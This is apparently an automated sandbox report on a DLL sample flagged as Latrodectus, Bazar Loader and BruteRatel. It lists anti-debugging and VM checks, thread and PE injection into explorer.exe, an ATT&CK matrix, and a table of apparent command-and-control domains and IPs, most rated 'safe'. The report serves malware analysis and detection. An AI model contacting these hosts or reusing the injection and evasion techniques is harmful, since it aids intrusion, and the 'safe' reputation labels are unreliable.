                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                      Source: explorer.exe, 00000016.00000002.2942821965.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_18-2200
                      Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_22-3034
                      Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800118B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000D1F4 GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_000000018000D1F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001AC34 GetProcessHeap,6_2_000000018001AC34
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800118B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800118B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E470 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_000000018000E470
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000D638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018000D638

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 138.124.183.215 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 3.69.236.35 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.194.11.183 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 54.175.181.104 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 95.164.68.73 443Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.155 443Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 13A0000 protect: page execute and read and writeJump to behavior
                      Contains functionality to inject threads in other processes
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_3_00007DF4F0240100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,18_3_00007DF4F0240100
                      Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000000026E7A1370 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,18_2_000000026E7A1370
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 13A0000Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 13A0000 value starts with: 4D5AJump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\rundll32.exeMemory written: PID: 2580 base: 13A0000 value: 4DJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516Jump to behavior
                      Sets debug register (to hijack the execution of another thread)
                      Source: C:\Windows\System32\rundll32.exeThread register set: 6516 1Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 13A0000Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1Jump to behavior
                      Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                      Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800206B0 cpuid 6_2_00000001800206B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_000000018000E5BC
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A7318 GetUserNameA,wsprintfA,22_2_013A7318
                      Source: C:\Windows\explorer.exeCode function: 22_2_013ADB28 GetVersionExW,22_2_013ADB28
                      Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Bazar Loader
                      Source: Yara matchFile source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected BruteRatel
                      Source: Yara matchFile source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Bazar Loader
                      Source: Yara matchFile source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected BruteRatel
                      Source: Yara matchFile source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      Registry Run Keys / Startup Folder                      		912
                      Process Injection                      		21
                      Virtualization/Sandbox Evasion                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      Registry Run Keys / Startup Folder                      		912
                      Process Injection                      		LSASS Memory51
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		1
                      Obfuscated Files or Information                      		Security Account Manager21
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Regsvr32                      		NTDS3
                      Process Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Rundll32                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Account Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      System Owner/User Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                      File and Directory Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing13
                      System Information Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1439879 Sample: upfilles.dll.exe Startdate: 11/05/2024 Architecture: WINDOWS Score: 100 39 workspacin.cloud 2->39 41 boriz400.com 2->41 43 8 other IPs or domains 2->43 53 Found malware configuration 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Latrodectus 2->57 59 5 other signatures 2->59 9 loaddll64.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 1 12 9->11         started        15 cmd.exe 1 9->15         started        17 rundll32.exe 9->17         started        19 8 other processes 9->19 dnsIp6 47 altynbe.com 138.124.183.215, 443, 49750, 49757 NOKIA-ASFI Norway 11->47 49 anikvan.com 95.164.68.73, 443, 49754, 49755 NASSIST-ASGI Gibraltar 11->49 51 3 other IPs or domains 11->51 65 System process connects to network (likely due to code injection or exploit) 11->65 67 Injects code into the Windows Explorer (explorer.exe) 11->67 69 Sets debug register (to hijack the execution of another thread) 11->69 71 5 other signatures 11->71 21 explorer.exe 38 2 11->21 injected 25 rundll32.exe 15->25         started        27 WerFault.exe 20 16 17->27         started        29 WerFault.exe 16 19->29         started        31 WerFault.exe 16 19->31         started        33 WerFault.exe 16 19->33         started        signatures7 process8 dnsIp9 45 workspacin.cloud 104.21.16.155, 443, 49777, 49782 CLOUDFLARENETUS United States 21->45 61 System process connects to network (likely due to code injection or exploit) 21->61 35 rundll32.exe 21->35         started        37 rundll32.exe 21->37         started        63 Contains functionality to inject threads in other processes 25->63 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      upfilles.dll.dll16%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
                      https://outlook.com_0%URL Reputationsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(0%Avira URL Cloudsafe
                      https://altynbe.com/tyk.io0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure40%Avira URL Cloudsafe
                      https://anikvan.com/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/0%Avira URL Cloudsafe
                      https://boriz400.com/api/azurey0%Avira URL Cloudsafe
                      https://illoskanawer.com/live/0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=0%Avira URL Cloudsafe
                      https://powerpoint.office.comcember0%URL Reputationsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure0%Avira URL Cloudsafe
                      http://schemas.micro0%URL Reputationsafe
                      https://altynbe.com/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP0%Avira URL Cloudsafe
                      https://anikvan.com/I~0%Avira URL Cloudsafe
                      https://anikvan.com/0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f0%Avira URL Cloudsafe
                      https://boriz400.com/api/azure0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php40%Avira URL Cloudsafe
                      https://anikvan.com/content.php.f0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/0vaH0%Avira URL Cloudsafe
                      https://altynbe.com/U~0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/60%Avira URL Cloudsafe
                      https://altynbe.com/B_F0%Avira URL Cloudsafe
                      https://anikvan.com/content.phpGf0%Avira URL Cloudsafe
                      https://altynbe.com/content.php2f0%Avira URL Cloudsafe
                      https://anikvan.com/api/azuret.php.f0%Avira URL Cloudsafe
                      https://altynbe.com/0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php0%Avira URL Cloudsafe
                      https://anikvan.com/d0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j0%Avira URL Cloudsafe
                      https://altynbe.com/api/azureontent.phpMfE0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA0%Avira URL Cloudsafe
                      https://altynbe.com/api/azure0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/J50%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF0%Avira URL Cloudsafe
                      https://boriz400.com/qa0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j0%Avira URL Cloudsafe
                      https://workspacin.cloud/0%Avira URL Cloudsafe
                      https://boriz400.com/content.php0%Avira URL Cloudsafe
                      https://altynbe.com/X0%Avira URL Cloudsafe
                      https://altynbe.com/d0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP0%Avira URL Cloudsafe
                      https://anikvan.com/api/azure==0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB0%Avira URL Cloudsafe
                      https://boriz400.com/0%Avira URL Cloudsafe
                      https://altynbe.com/5~0%Avira URL Cloudsafe
                      https://altynbe.com/api/azureure0%Avira URL Cloudsafe
